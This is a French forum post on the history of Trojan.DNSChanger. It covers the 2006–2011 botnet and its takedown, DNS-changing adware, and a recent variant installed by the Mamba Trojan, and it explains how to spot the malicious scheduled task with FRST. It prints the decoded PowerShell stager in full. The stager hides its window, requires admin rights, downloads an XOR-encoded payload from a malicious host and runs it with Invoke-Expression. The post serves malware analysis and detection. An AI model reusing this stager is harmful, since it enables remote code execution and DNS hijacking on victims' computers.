Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.
Le tout premier Trojan DNS nommé DNSChanger était un malware lié aux attaques rogues/scareware (Trojan.FakeAv et plus antérieure Trojan.Zlob), il a sévit de 2006 à 2011. Quelques liens :
Trojan DNSChanger et Trojan DNSChanger.
Ce malware est monté à plus de 4 millions de bots, utilisant des serveurs aux USA et dont l'origine est l'Estonie. En 2011, une opération de démantèlement a eu lieu :
Esthost Taken Down – Biggest Cybercriminal Takedown in History (Trend-Micro)
Cybercrime Kingpin Pleads Guilty (krebonsecurity).
La monétisation du botnet se faisait à travers du "clic fraud" c'est à dire la génération de clics sur des publicités et auraient atteint les 14 millions de dollars.
La structure du Trojan DNSChanger :
Depuis, certains Adware dont CloudScout utilise ce procédé de modification DNS et notamment le fameux DNS Unlocker(qui semble changer de noms depuis vers des noms en *Lix >> AnyFlix / TopFlix etc)
Un autre malware type "DNSChanger" est aussi très en vogue ces dernières semaines, je le vois pas mal sur des rapports pjjoint (FRST).
Ce DNSChanger serait installé par un Trojan qui se nomme Mamba, un Trojan écrit en python.
Malwarebytes et Cisco ont publié des actualités dessus.
Malwarebytes Trojan.DNSChanger
DNSChanger Outbreak Linked to Adware Install Base
Ce dernier s'appuie sur une tâche planifiée qui lance PowerShell, vous avez un exemple sur ce rapport pjjoint : http://pjjoint.malekal.com/files.php?re ... x13t7y1012
Décodé on obtient :
Code : Tout sélectionner
$ErrorActionPreference="stop";$sc="SilentlyContinue";$WarningPreference=$sc;$ProgressPreference=$sc;$VerbosePreference=$sc;$DebugPreference=$sc;
function sr($p){$n="WindowPosition";try{New-Item -Path $p|Out-Null;}catch{}try{New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|Out-Null;}
catch{try{Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;}catch{}}}sr("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");sr("HKCU:\Console\%SystemRoot%_System32_svchost.exe");sr("HKCU:\Console\taskeng.exe");
$surl="http://fasilmy.info/u/?q=1WLt_qZkpelxemrtZvcUXqyUXFuJUWUndPk85JmwYo3WQMR0XdiH_4TRAO97XYHgwjqT8zHAz9UVmbPil6bhCwTLqZ9wsH64N-E10_rPNG8CYeMi0HWMvLi9ulQ-y3dtZHTXoq7yzRKaa25oUbeuJa9ViFWb8jcya5OIQgrQErwfCYs4_Z7ulLPgvHydQrNonjGscQM26VSfLWcjpI3QK56W2THxGmjdLjU-PE878tNIZ-H0D-w1Jf2iHInjpCaOfIgFIZVhAlplZfoHOpOYg36QKb-KyRS_TuF09yir-3p2WeoUOdyNl1KvUE9SU19zsAhE_Mb6rKSGXpyPGUyyODOr-PO56dlLvZKOUTIGRQfnkBa1luRdrN9fEKy3D06zQaio2bfq0YC2CFGpJ-1re12wQ5Ums0IXfgdEg6Gl082PvhW4advUh34XwhlXkM6k0sl58OjK6DNIMc0&c=Us3DEoFo5gpr0Yr7qy1XpsNyO90HLzg5CncwF1A5qTwqAwt6LrmbOW_3KwQ1x7jdwDIhLS3N8Mh-J2CpCzVIGSVg_EWYjaKExDh_uJbGwM4qSAMyG7pssR_ief3zvv6fGmxYydUTPVMvYwn3x25vO1MWrHufGzV15kXVys4PzGaJY3IkFWE2IFKQOP3eApFdQq_kbD8kJGSI0ardocvOKS2Li8dFwwbVZWQ5xGHXFkedYmqFUUTNjEyJhhwfzcP0xvZaIQuGj2PPh5hlAgUiFxCgkhWSxpkDQW91EO4qacAPnLmx_6iYbgC0BTmxp96HgcUgpNc9NGWAPVATzfdMUNxdvwHq8zp-1tvSc2S7ttcXlSgZ6KqwRtjy1wJkKpBqH9C-i6OFB8vqGU02u2GV7rpWYGUKd5-jHIdn8lCtMbkb7Wm-2jE6KHGK24X79NtGz15l7RxbH3um6pzctNvEu9JqHj0dBl4RCKHOY2PMGJ8X4BipH_4rjMSpFSAu6AA9ZW2peVUOnPlcxzztn5gowrmKsdE6KSgVdaPsOiIG46O0crj4M6_EbsQqS39kPguVvfTrc1JppmOhkkO1getgp0jBdr2_lbK1y68LJksYK2h-v2ZX9_P28lnMEKPea9ZUcSqzFH3paRdBvOMfVldOds2gE9oKsopfX2k&r=8176974896963333939";$stsk="{29868362-9105-EA9B-C368-4FB6EFFBF867}";$prid="DT";$inid="0";try{if($PSVersionTable.PSVersion.Major -lt 2){break;}$v=[System.Environment]::OSVersion.Version;
if($v.Major -eq 5){if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){break;}}
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){break;}
function wc($url){$rq=New-Object System.Net.WebClient;$rq.UseDefaultCredentials=$true;$rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));}
function dstr($rawdata){$bt=[Convert]::FromBase64String($rawdata);$ext=$bt[0];$key=$bt[1] -bxor 170;for($i=2;$i -lt $bt.Length;$i++){$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));}
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();}
$sc=dstr(wc($surl));Invoke-Expression -command "$sc";}catch{};exit 0;
(A ce sujet, concernant les malwares utilisant PowerShell, je vous renvoie sur le sujet : Malware FileLess : Kovter, PoweLiks, Gootkit, etc)
La campagne de Trojan DNSChanger atteint les 100 hosts par millions :
Pour vérifier si un Windows est infecté, simplement lancer une analyse FRST (le tutoriel FRST) et vérifier le contenu du fichier Addition.txt si la tâche planifiée est présente.
Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.